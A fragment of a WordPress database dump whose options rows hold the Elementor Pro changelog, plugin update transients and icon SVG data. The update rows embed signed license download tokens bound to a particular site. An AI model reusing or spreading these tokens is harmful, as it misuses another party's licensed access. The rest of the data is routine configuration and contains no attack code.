href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2391\\\">#2391<\\/a>)<\\/li>\\n<li>Fix: Print the main menu only when is necessary in Menu widget<\\/li>\\n<li>Fix: Use CSS media query instead of JS to hide items in Menu widget to avoid flickering on page load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2381\\\">#2381<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.8.0 - 2017-09-12<\\/h4>\\n<ul>\\n<li>New: Added Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1406\\\">#1406<\\/a>)<\\/li>\\n<li>Fix: Field ID for checkbox control in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2279\\\">#2279<\\/a>)<\\/li>\\n<li>Fix: Style for Blockquote widget included<\\/li>\\n<\\/ul>\\n<h4>1.7.2 - 2017-09-07<\\/h4>\\n<ul>\\n<li>Tweak: Loading Facebook SDK via JS for better compatibility with caching plugins<\\/li>\\n<li>Fix: Responsive Embed Facebook post widget for Safari iOS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2340\\\">#2340<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.7.1 - 2017-09-05<\\/h4>\\n<ul>\\n<li>Fix: Facebook SDK version<\\/li>\\n<\\/ul>\\n<h4>1.7.0 - 2017-09-05<\\/h4>\\n<ul>\\n<li>New: Added Facebook Button widget for Like, Recommend, Share and Follow<\\/li>\\n<li>New: Added Facebook Embed widget for Post, Video and Comment<\\/li>\\n<li>New: Added Facebook Comments widget<\\/li>\\n<li>New: Added Facebook Page widget (Previously known as Like Box)<\\/li>\\n<li>New: Added Blockquote widget with Tweet button<\\/li>\\n<li>Tweak: Added Facebook SDK integration for all Facebook widgets<\\/li>\\n<li>Fix: Animated headline rotating with long words<\\/li>\\n<\\/ul>\\n<h4>1.6.1 - 2017-08-28<\\/h4>\\n<ul>\\n<li>Fix: Animated Headline marker gets in front of neighboring spans even when "Bring to Front" is not set<\\/li>\\n<li>Fix: Stroke animation in Animated Headline for MS Edge browser<\\/li>\\n<li>Fix: Animated headline with more than 1-word per rotation<\\/li>\\n<li>Fix: Animated Headline in two lines<\\/li>\\n<li>Fix: Some errors in Global widget<\\/li>\\n<\\/ul>\\n<h4>1.6.0 - 2017-08-22<\\/h4>\\n<ul>\\n<li>New: Added Animated Headline widget<\\/li>\\n<li>New: Added Hidden field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2038\\\">#2038<\\/a>)<\\/li>\\n<li>Tweak: Added notice to update Elementor to v1.6.5 or higher<\\/li>\\n<li>Fix: CSS Animations names no longer minified, in order to prevent unexpected conflicts<\\/li>\\n<\\/ul>\\n<h4>1.5.9 - 2017-08-16<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.7<\\/li>\\n<li>Fix: Portfolio compatibility for GeneratePress theme<\\/li>\\n<li>Fix: Portfolio filter compatibility for RTL<\\/li>\\n<li>Fix: Pagination apply for all posts widget in the page<\\/li>\\n<li>Fix: Global form widget with MailChimp integration not saving<\\/li>\\n<\\/ul>\\n<h4>1.5.8 - 2017-07-25<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.6<\\/li>\\n<li>Fix: Improved backward compatibility for query control rename<\\/li>\\n<\\/ul>\\n<h4>1.5.7 - 2017-07-24<\\/h4>\\n<ul>\\n<li>Tweak: Moved JS render of reCAPTCHA to a separate file<\\/li>\\n<li>Tweak: Display the label in the reCAPTCHA field for better experience<\\/li>\\n<li>Tweak: Rename <code>panel-posts-control<\\/code> to <code>query-control<\\/code> and added fallback support<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor with history feature<\\/li>\\n<li>Fix: reCAPTCHA preview on the editor<\\/li>\\n<li>Fix: Manual selection (query control) has stopped working after saving (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2000\\\">#2000<\\/a>)<\\/li>\\n<li>Fix: Added condition for icon size control in Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>1.5.6 - 2017-07-12<\\/h4>\\n<ul>\\n<li>Fix: Query Control correction for taxonomies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1963\\\">#1963<\\/a>)<\\/li>\\n<li>Fix: Custom CSS override scheme color in the editor<\\/li>\\n<li>Fix: Added order by Menu Order for Query Control in WC widget<\\/li>\\n<li>Fix: Glitch with Flip Box background overlay<\\/li>\\n<\\/ul>\\n<h4>1.5.5 - 2017-07-03<\\/h4>\\n<ul>\\n<li>Tweak: Moved reCAPTCHA render to handler & load only if a form is exist<\\/li>\\n<li>Fix: MailChimp integration: Default number of items returned by API increased to 999<\\/li>\\n<li>Fix: MailChimp integration: Refresh the groups list if API is changed<\\/li>\\n<li>Fix: Sorted items in filter bar by A-Z<\\/li>\\n<li>Fix: Editor glitch with Elementor v1.5 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1927\\\">#1927<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.5.4 - 2017-06-22<\\/h4>\\n<ul>\\n<li>Tweak: Improved compatibility for Elementor v1.5<\\/li>\\n<li>Fix: URL default for Add To Cart widget<\\/li>\\n<li>Fix: Allowed <code>date<\\/code> and <code>birthday<\\/code> fields as text for MailChimp integration<\\/li>\\n<\\/ul>\\n<h4>1.5.3 - 2017-06-19<\\/h4>\\n<ul>\\n<li>Tweak: Make flip-box height responsive control<\\/li>\\n<li>Fix: Facebook share count now gets retrieved by Elementor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1829\\\">#1829<\\/a>)<\\/li>\\n<li>Fix: Global form widget with MailChimp integration not saving<\\/li>\\n<\\/ul>\\n<h4>1.5.2 - 2017-06-13<\\/h4>\\n<ul>\\n<li>Fix: Custom CSS panel location compatibility for the old versions<\\/li>\\n<\\/ul>\\n<h4>1.5.1 - 2017-06-12<\\/h4>\\n<ul>\\n<li>Fix: MailChimp update existing user registration<\\/li>\\n<li>Fix: Global widget with JS in the editor mode<\\/li>\\n<li>Fix: Label section condition in Login widget<\\/li>\\n<li>Fix: Changes to unlinked global widget do not appear in the editor<\\/li>\\n<\\/ul>\\n<h4>1.5.0 - 2017-05-23<\\/h4>\\n<ul>\\n<li>New: Added Cards, a new skin for Posts widget<\\/li>\\n<li>New: Added Exclude option to post query control group<\\/li>\\n<li>Tweak: Added <code>post_class()<\\/code> for each post in the loop<\\/li>\\n<li>Tweak: Added <code>.elementor-posts-masonry<\\/code> class when Masonry layout is enabled<\\/li>\\n<li>Tweak: Added compatibility for the next release of Elementor v1.5.0<\\/li>\\n<li>Tweak: CSS <code>autoprefixer<\\/code> now supports last 5 versions of browsers<\\/li>\\n<li>Tweak: Added <code>imageLoaded<\\/code> library for Posts & Portfolio widgets<\\/li>\\n<\\/ul>\\n<h4>1.4.4 - 2017-05-18<\\/h4>\\n<ul>\\n<li>Fix: Force Mailchimp API to return all lists and not just 10 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1683\\\">#1683<\\/a>)<\\/li>\\n<li>Fix: Added <code>.elementor-form<\\/code> class to Login form to fix style glitch<\\/li>\\n<\\/ul>\\n<h4>1.4.3 - 2017-05-14<\\/h4>\\n<ul>\\n<li>Tweak: Added Redirect After Login option to Login widget<\\/li>\\n<li>Tweak: Stay in the current page after logout in Login widget<\\/li>\\n<li>Tweak: Preparation for Elementor settings tabs in future version<\\/li>\\n<li>Fix: Pinterest in Share Buttons widget now sharing the URL alone<\\/li>\\n<li>Fix: Bug with <code>active<\\/code> class in portfolio filter item<\\/li>\\n<li>Fix: Higher specific list-style-type <code>none<\\/code> for filter items to override some theme style<\\/li>\\n<\\/ul>\\n<h4>1.4.2 - 2017-05-06<\\/h4>\\n<ul>\\n<li>Fix: Temporary patch for form field shortcode in some servers<\\/li>\\n<\\/ul>\\n<h4>1.4.1 - 2017-05-03<\\/h4>\\n<ul>\\n<li>Fix: Bug with custom success message in form widget<\\/li>\\n<li>Fix: Bug with meta data in email action<\\/li>\\n<\\/ul>\\n<h4>1.4.0 - 2017-05-03<\\/h4>\\n<ul>\\n<li>New: Forms: integration with MailChimp<\\/li>\\n<li>New: Forms: integration with MailPoet<\\/li>\\n<li>New: Forms: Added Email 2 action for email confirmation<\\/li>\\n<li>New: Forms: Added shortcodes for fields<\\/li>\\n<li>New: Forms: Added custom ID for fields<\\/li>\\n<li>New: Forms: Added option to edit email HTML template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1180\\\">#1180<\\/a>)<\\/li>\\n<li>New: Added Login widget<\\/li>\\n<li>Tweak: Move <code>send_html<\\/code> control to <code>email_content_type<\\/code><\\/li>\\n<li>Fix: Email still sent even if validation failed in form widget<\\/li>\\n<\\/ul>\\n<h4>1.3.2 - 2017-05-01<\\/h4>\\n<ul>\\n<li>New: Added action <code>elementor_pro\\/init<\\/code> for better integration with Elementor Pro<\\/li>\\n<li>Fix: Posts without featured image in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1234\\\">#1234<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1382\\\">#1382<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA & Honeypot fields with new method<\\/li>\\n<li>Fix: Added border width control in Share Buttons to avoid a glitch on Chrome browser<\\/li>\\n<li>Fix: Border radius glitch on hover in Share Buttons<\\/li>\\n<\\/ul>\\n<h4>1.3.1 - 2017-04-25<\\/h4>\\n<ul>\\n<li>Fix: Conflict update with revision history module<\\/li>\\n<\\/ul>\\n<h4>1.3.0 - 2017-04-25<\\/h4>\\n<ul>\\n<li>New: Added Share Buttons widget (<a href=\\\"https:\\/\\/wordpress.org\\/support\\/topic\\/social-sharing-buttons-is-it-possible\\/\\\">Topic<\\/a>)<\\/li>\\n<li>New: Added Custom CSS for Page Settings<\\/li>\\n<li>New: Added Masonry layout for Portfolio widget<\\/li>\\n<li>New: Added Cc & Bcc options to email action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1181\\\">#1181<\\/a>)<\\/li>\\n<li>New: Introduced <code>ElementorProModulesFormsClassesAction_Base<\\/code> class for better 3rd party integration for forms<\\/li>\\n<li>Tweak: Debugger module now also shows errors from Pro<\\/li>\\n<li>Tweak: Added options for Elementor Library<\\/li>\\n<li>Tweak: New base posts module for optimized performance<\\/li>\\n<li>Tweak: Adjusting Posts \\/ Portfolio to the new structure<\\/li>\\n<li>Fix: Export for posts \\/ portfolio<\\/li>\\n<li>Fix: Duplicate repeater field with switcher control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1442\\\">#1442<\\/a>)<\\/li>\\n<li>Fix: Post per Page in the query control<\\/li>\\n<li>Fix: Metadata does not come through on form emails (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1566\\\">#1566<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.2.6 - 2017-04-19<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility with WooCommerce 3.0 - Products & Add to Cart widgets<\\/li>\\n<\\/ul>\\n<h4>1.2.5 - 2017-04-18<\\/h4>\\n<ul>\\n<li>Fix: Offset query for posts widgets (Posts, Portfolio and Products)<\\/li>\\n<\\/ul>\\n<h4>1.2.4 - 2017-03-21<\\/h4>\\n<ul>\\n<li>Tweak: Added Indian Rupee sign to Price Table widget<\\/li>\\n<li>Fix: Portfolio grid for IE11<\\/li>\\n<li>Fix: Link target blank in Price List widget<\\/li>\\n<li>Fix: Active item for filter bar in Portfolio widget<\\/li>\\n<\\/ul>\\n<h4>1.2.3 - 2017-03-06<\\/h4>\\n<ul>\\n<li>Tweak: Fully compatible with Elementor v1.3.0<\\/li>\\n<li>Tweak: Added trigger for after form submission in Forms widget<\\/li>\\n<li>Tweak: Changed handle name in reCAPTCHA field to avoid conflict with other contact forms<\\/li>\\n<li>Fix: Portfolio filter syntax in Non-Latin languages<\\/li>\\n<li>Fix: Added <code>no-repeat<\\/code> property for slide with <code>background-size:contain<\\/code><\\/li>\\n<li>Fix: Condition control & Import value in Posts widgets<\\/li>\\n<li>Fix: Offset and Pagination in WordPress (<a href=\\\"https:\\/\\/codex.wordpress.org\\/Making_Custom_Queries_using_Offset_and_Pagination\\\">More Info<\\/a>)<\\/li>\\n<li>Fix: Submit handler bubbling for custom events in Forms widget<\\/li>\\n<\\/ul>\\n<h4>1.2.2 - 2017-02-23<\\/h4>\\n<ul>\\n<li>Tweak: Change name from Side A\\/B to Front and Back in Flip Box widget<\\/li>\\n<li>Fix: Error when saving third party widgets in the global widget<\\/li>\\n<li>Fix: Image position "none" remains visible in editor preview (Posts)<\\/li>\\n<li>Fix: Hide the pagination when there are no links<\\/li>\\n<\\/ul>\\n<h4>1.2.1 - 2017-02-21<\\/h4>\\n<ul>\\n<li>Fix: Firefox Flip Box 3D compatibility<\\/li>\\n<\\/ul>\\n<h4>1.2.0 - 2017-02-21<\\/h4>\\n<ul>\\n<li>New: Added Flip Box widget<\\/li>\\n<li>New: Added Ken Burns effect for slides<\\/li>\\n<li>New: Added Masonry layout for Posts widget<\\/li>\\n<li>New: Added Pagination option for Posts widget<\\/li>\\n<li>Tweak: Added background size contain to slides<\\/li>\\n<li>Tweak: Improve Query control by preload items<\\/li>\\n<li>Fix: Text color for Checkbox and Radio fields<\\/li>\\n<\\/ul>\\n<h4>1.1.2 - 2017-02-05<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>aria-required<\\/code> for better accessibility in forms widget<\\/li>\\n<li>Fix: Conflict Call to <code>undefined<\\/code> method in Posts & Portfolio widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1271\\\">#1271<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1266\\\">#1266<\\/a>)<\\/li>\\n<li>Fix: Submit button HTML after error sending<\\/li>\\n<li>Fix: Success message for <code>skip_email<\\/code> function<\\/li>\\n<li>Notice: Elementor 1.2.0 or later now required<\\/li>\\n<\\/ul>\\n<h4>1.1.1 - 2017-01-24<\\/h4>\\n<ul>\\n<li>Fix: Can\'t save global widgets when <code>WP_DEBUG<\\/code> is <code>true<\\/code><\\/li>\\n<li>Fix: Undefined variable in WC widgets<\\/li>\\n<li>Fix: Removed duplicate strings<\\/li>\\n<\\/ul>\\n<h4>1.1.0 - 2017-01-24<\\/h4>\\n<ul>\\n<li>New: Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/102\\\">#102<\\/a>)<\\/li>\\n<li>New: WooCommerce Add to Cart widget<\\/li>\\n<li>New: WooCommerce Categories widget<\\/li>\\n<li>New: WooCommerce Elements widget<\\/li>\\n<li>New: Honeypot field for Forms widgets<\\/li>\\n<li>Tweak: Added inline options for taxonomies & authors if is less than 15 items<\\/li>\\n<li>Tweak: Added Required Mark for fields in Forms widget<\\/li>\\n<li>Fix: CSS selectors priority in Slides widget<\\/li>\\n<li>Fix: CSS bug in Price List widget<\\/li>\\n<li>Fix: Update all Post CSS files that includes specific Global Widget<\\/li>\\n<\\/ul>\\n<h4>1.0.9 - 2017-01-18<\\/h4>\\n<ul>\\n<li>Fix: Auto complete bug in query controls<\\/li>\\n<li>Fix: Render template with escaping slashes<\\/li>\\n<li>Fix: Reply-to field in Forms widget<\\/li>\\n<\\/ul>\\n<h4>1.0.8 - 2017-01-11<\\/h4>\\n<ul>\\n<li>Tweak: Code adjustments for Elementor API<\\/li>\\n<li>Fix: Removed go pro link from plugins page in admin<\\/li>\\n<\\/ul>\\n<h4>1.0.7 - 2017-01-05<\\/h4>\\n<ul>\\n<li>Tweak: Added filter by featured \\/ sale for WC Products widget<\\/li>\\n<li>Tweak: Added author control in Portfolio widget<\\/li>\\n<li>Tweak: Code adjustments for Elementor API<\\/li>\\n<li>Fix: Added support for empty image ratio<\\/li>\\n<li>Fix: Avoid nesting a sidebar within a template that will appear in the sidebar itself<\\/li>\\n<\\/ul>\\n<h4>1.0.6 - 2017-01-01<\\/h4>\\n<ul>\\n<li>Tweak: Added Auto-updates for local translation files<\\/li>\\n<li>Fix: Custom CSS for Global widgets<\\/li>\\n<li>Fix: Remove <code>nonce<\\/code> field (Fix some cache plugins)<\\/li>\\n<\\/ul>\\n<h4>1.0.5 - 2016-12-27<\\/h4>\\n<ul>\\n<li>Fix: Slide element bug fix - \'Link apply on\' logic<\\/li>\\n<li>Fix: Removed unique wrapper for Custom CSS in order to allow media queries (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1086\\\">#1086<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.0.4 - 2016-12-21<\\/h4>\\n<ul>\\n<li>Tweak: Mobile Editing for fields in the form widget<\\/li>\\n<li>Tweak: Mobile Editing for posts<\\/li>\\n<li>Tweak: Allow send form as HTML<\\/li>\\n<li>Tweak: Improved auto upgrades for Multisite installation<\\/li>\\n<li>Tweak: Improve editor rendering experience for Portfolio widget<\\/li>\\n<li>Fix: Posts widget check if image exist<\\/li>\\n<li>Fix: Changed the clone method for global widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1042\\\">#1042<\\/a>)<\\/li>\\n<li>Fix: Bug slides in RTL (removed direction control)<\\/li>\\n<li>Fix: Slides with no height jumps when changing slides<\\/li>\\n<\\/ul>\\n<h4>1.0.3 - 2016-12-13<\\/h4>\\n<ul>\\n<li>Fix: Added escape placeholder for HTML Entities in form widget<\\/li>\\n<li>Fix: Countdown widget RTL bug<\\/li>\\n<li>Fix: Remove redundant #elementor selector for control style<\\/li>\\n<li>Fix: Added prefixing with \'0\' for one digit number in Countdown widget<\\/li>\\n<\\/ul>\\n<h4>1.0.2 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Fix: Page layout collapses when inserting reCAPTCHA field in Form<\\/li>\\n<\\/ul>\\n<h4>1.0.1 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Fix: WordPress widgets disappear from Editor when Elementor Pro active<\\/li>\\n<\\/ul>\\n<h4>1.0.0 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Initial release<\\/li>\\n<\\/ul>\\\";}\",\"new_version\":\"3.35.0\",\"name\":\"Elementor Pro\",\"slug\":\"elementor-pro\",\"url\":\"https:\\/\\/elementor.com\\/pro\\/changelog\\/\",\"homepage\":\"https:\\/\\/elementor.com\\/pro\\/\",\"requires\":\"5.0\",\"tested\":\"6.9.1\",\"elementor_requires\":\"3.0.1\",\"package\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/package_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidXJsIjoiaHR0cDovL2ljdGJhbmsuaXIvYmxvZyIsImRvd25sb2FkX2JldGEiOmZhbHNlLCJmaWxlX2tleSI6IjEiLCJpYXQiOjE3NzA3MDk0MjAsImV4cCI6MTc3MDc5NTgyMH0.TXlvjtBKXCmVhFzbN7Tds1u_NmCvMbfWeZhaAFCIFrk\\/package_download\",\"download_link\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/package_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidXJsIjoiaHR0cDovL2ljdGJhbmsuaXIvYmxvZyIsImRvd25sb2FkX2JldGEiOmZhbHNlLCJmaWxlX2tleSI6IjEiLCJpYXQiOjE3NzA3MDk0MjAsImV4cCI6MTc3MDc5NTgyMH0.TXlvjtBKXCmVhFzbN7Tds1u_NmCvMbfWeZhaAFCIFrk\\/package_download\",\"banners\":{\"2x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-1544x500.png?rev=1475479\",\"1x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-772x250.png?rev=1475479\"},\"icons\":{\"svg\":\"https:\\/\\/storage.googleapis.com\\/web-public-files\\/Web%20Assets\\/icons\\/icon.svg\"},\"canary_deployment\":{\"plugin_info\":{\"new_version\":\"3.7.0\",\"name\":\"Elementor Pro\",\"slug\":\"elementor-pro\",\"url\":\"https:\\/\\/elementor.com\\/pro\\/changelog\\/\",\"homepage\":\"https:\\/\\/elementor.com\\/pro\\/\",\"requires\":\"5.0\",\"tested\":\"6.9.1\",\"elementor_requires\":\"3.0.1\",\"package\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/previous_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidmVyc2lvbiI6IjMuNy4wIiwidXJsIjoiaHR0cDovL2ljdGJhbmsuaXIvYmxvZyIsImlhdCI6MTc3MDcwOTQyMCwiZXhwIjoxNzcwNzk1ODIwfQ.lF1bRqM2AMPyFCFnv7TUTXRs-jIysZObZ7B6-SSiiFA\\/previous_download\",\"download_link\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/previous_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidmVyc2lvbiI6IjMuNy4wIiwidXJsIjoiaHR0cDovL2ljdGJhbmsuaXIvYmxvZyIsImlhdCI6MTc3MDcwOTQyMCwiZXhwIjoxNzcwNzk1ODIwfQ.lF1bRqM2AMPyFCFnv7TUTXRs-jIysZObZ7B6-SSiiFA\\/previous_download\",\"banners\":{\"2x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-1544x500.png?rev=1475479\",\"1x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-772x250.png?rev=1475479\"},\"icons\":{\"svg\":\"https:\\/\\/storage.googleapis.com\\/web-public-files\\/Web%20Assets\\/icons\\/icon.svg\"}},\"conditions\":[[{\"type\":\"language\",\"languages\":[\"he_IL\",\"nl_NL\",\"en_GB\",\"en_NZ\",\"en_ZA\",\"en_AU\",\"en_CA\",\"sv_SE\",\"da_DK\",\"fr_FR\",\"nl_NL\",\"nb_NO\",\"de_AT\",\"fi\",\"it_IT\",\"nn_NO\",\"de_CH\",\"en_GB\",\"is_IS\",\"ga\",\"fr_BE\",\"nl_BE\",\"ast\",\"lb_LU\",\"es_ES\",\"pt_PT\",\"mlt\"],\"operator\":\"in\"}]]},\"cloud\":false}\";}','off'),
(510038,'_site_transient_update_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1778963511;s:8:\"response\";a:1:{s:31:\"elementor-pro/elementor-pro.php\";O:8:\"stdClass\":17:{s:14:\"stable_version\";s:6:\"3.35.0\";s:12:\"last_updated\";s:19:\"2026-02-02 09:47:18\";s:11:\"new_version\";s:6:\"3.35.0\";s:4:\"name\";s:13:\"Elementor Pro\";s:4:\"slug\";s:13:\"elementor-pro\";s:3:\"url\";s:36:\"https://elementor.com/pro/changelog/\";s:8:\"homepage\";s:26:\"https://elementor.com/pro/\";s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.9.1\";s:18:\"elementor_requires\";s:5:\"3.0.1\";s:7:\"package\";s:324:\"https://plugin-downloads.elementor.com/v2/package_download/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidXJsIjoiaHR0cDovL2ljdGJhbmsuaXIvYmxvZyIsImRvd25sb2FkX2JldGEiOmZhbHNlLCJmaWxlX2tleSI6IjEiLCJpYXQiOjE3NzA3MDk0MjAsImV4cCI6MTc3MDc5NTgyMH0.TXlvjtBKXCmVhFzbN7Tds1u_NmCvMbfWeZhaAFCIFrk/package_download\";s:13:\"download_link\";s:324:\"https://plugin-downloads.elementor.com/v2/package_download/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidXJsIjoiaHR0cDovL2ljdGJhbmsuaXIvYmxvZyIsImRvd25sb2FkX2JldGEiOmZhbHNlLCJmaWxlX2tleSI6IjEiLCJpYXQiOjE3NzA3MDk0MjAsImV4cCI6MTc3MDc5NTgyMH0.TXlvjtBKXCmVhFzbN7Tds1u_NmCvMbfWeZhaAFCIFrk/package_download\";s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:5:\"icons\";a:1:{s:3:\"svg\";s:75:\"https://storage.googleapis.com/web-public-files/Web%20Assets/icons/icon.svg\";}s:17:\"canary_deployment\";a:2:{s:11:\"plugin_info\";a:12:{s:11:\"new_version\";s:5:\"3.7.0\";s:4:\"name\";s:13:\"Elementor Pro\";s:4:\"slug\";s:13:\"elementor-pro\";s:3:\"url\";s:36:\"https://elementor.com/pro/changelog/\";s:8:\"homepage\";s:26:\"https://elementor.com/pro/\";s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.9.1\";s:18:\"elementor_requires\";s:5:\"3.0.1\";s:7:\"package\";s:301:\"https://plugin-downloads.elementor.com/v2/previous_download/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidmVyc2lvbiI6IjMuNy4wIiwidXJsIjoiaHR0cDovL2ljdGJhbmsuaXIvYmxvZyIsImlhdCI6MTc3MDcwOTQyMCwiZXhwIjoxNzcwNzk1ODIwfQ.lF1bRqM2AMPyFCFnv7TUTXRs-jIysZObZ7B6-SSiiFA/previous_download\";s:13:\"download_link\";s:301:\"https://plugin-downloads.elementor.com/v2/previous_download/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidmVyc2lvbiI6IjMuNy4wIiwidXJsIjoiaHR0cDovL2ljdGJhbmsuaXIvYmxvZyIsImlhdCI6MTc3MDcwOTQyMCwiZXhwIjoxNzcwNzk1ODIwfQ.lF1bRqM2AMPyFCFnv7TUTXRs-jIysZObZ7B6-SSiiFA/previous_download\";s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:5:\"icons\";a:1:{s:3:\"svg\";s:75:\"https://storage.googleapis.com/web-public-files/Web%20Assets/icons/icon.svg\";}}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:3:{s:4:\"type\";s:8:\"language\";s:9:\"languages\";a:27:{i:0;s:5:\"he_IL\";i:1;s:5:\"nl_NL\";i:2;s:5:\"en_GB\";i:3;s:5:\"en_NZ\";i:4;s:5:\"en_ZA\";i:5;s:5:\"en_AU\";i:6;s:5:\"en_CA\";i:7;s:5:\"sv_SE\";i:8;s:5:\"da_DK\";i:9;s:5:\"fr_FR\";i:10;s:5:\"nl_NL\";i:11;s:5:\"nb_NO\";i:12;s:5:\"de_AT\";i:13;s:2:\"fi\";i:14;s:5:\"it_IT\";i:15;s:5:\"nn_NO\";i:16;s:5:\"de_CH\";i:17;s:5:\"en_GB\";i:18;s:5:\"is_IS\";i:19;s:2:\"ga\";i:20;s:5:\"fr_BE\";i:21;s:5:\"nl_BE\";i:22;s:3:\"ast\";i:23;s:5:\"lb_LU\";i:24;s:5:\"es_ES\";i:25;s:5:\"pt_PT\";i:26;s:3:\"mlt\";}s:8:\"operator\";s:2:\"in\";}}}}s:5:\"cloud\";b:0;s:6:\"plugin\";s:31:\"elementor-pro/elementor-pro.php\";}}s:7:\"checked\";a:1:{s:31:\"elementor-pro/elementor-pro.php\";s:6:\"3.35.0\";}s:12:\"translations\";a:0:{}}','off'),
(510039,'_site_transient_update_themes','O:8:\"stdClass\":1:{s:12:\"last_checked\";i:1778963531;}','off'),
(510042,'_elementor_assets_data','a:1:{s:3:\"svg\";a:1:{s:9:\"font-icon\";a:3:{s:14:\"eicon-menu-bar\";a:2:{s:7:\"content\";a:4:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"path\";s:279:\"M104 333H896C929 333 958 304 958 271S929 208 896 208H104C71 208 42 237 42 271S71 333 104 333ZM104 583H896C929 583 958 554 958 521S929 458 896 458H104C71 458 42 487 42 521S71 583 104 583ZM104 833H896C929 833 958 804 958 771S929 708 896 708H104C71 708 42 737 42 771S71 833 104 833Z\";s:3:\"key\";s:14:\"eicon-menu-bar\";}s:7:\"version\";s:6:\"5.13.0\";}s:11:\"eicon-close\";a:2:{s:7:\"content\";a:4:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"path\";s:361:\"M742 167L500 408 258 167C246 154 233 150 217 150 196 150 179 158 167 167 154 179 150 196 150 212 150 229 154 242 171 254L408 500 167 742C138 771 138 800 167 829 196 858 225 858 254 829L496 587 738 829C750 842 767 846 783 846 800 846 817 842 829 829 842 817 846 804 846 783 846 767 842 750 829 737L588 500 833 258C863 229 863 200 833 171 804 137 775 137 742 167Z\";s:3:\"key\";s:11:\"eicon-close\";}s:7:\"version\";s:6:\"5.13.0\";}s:14:\"fas-caret-down\";a:2:{s:7:\"content\";a:4:{s:5:\"width\";i:320;s:6:\"height\";i:512;s:4:\"path\";s:119:\"M31.3 192h257.3c17.8 0 26.7 21.5 14.1 34.1L174.1 354.8c-7.8 7.8-20.5 7.8-28.3 0L17.2 226.1C4.6 213.5 13.5 192 31.3 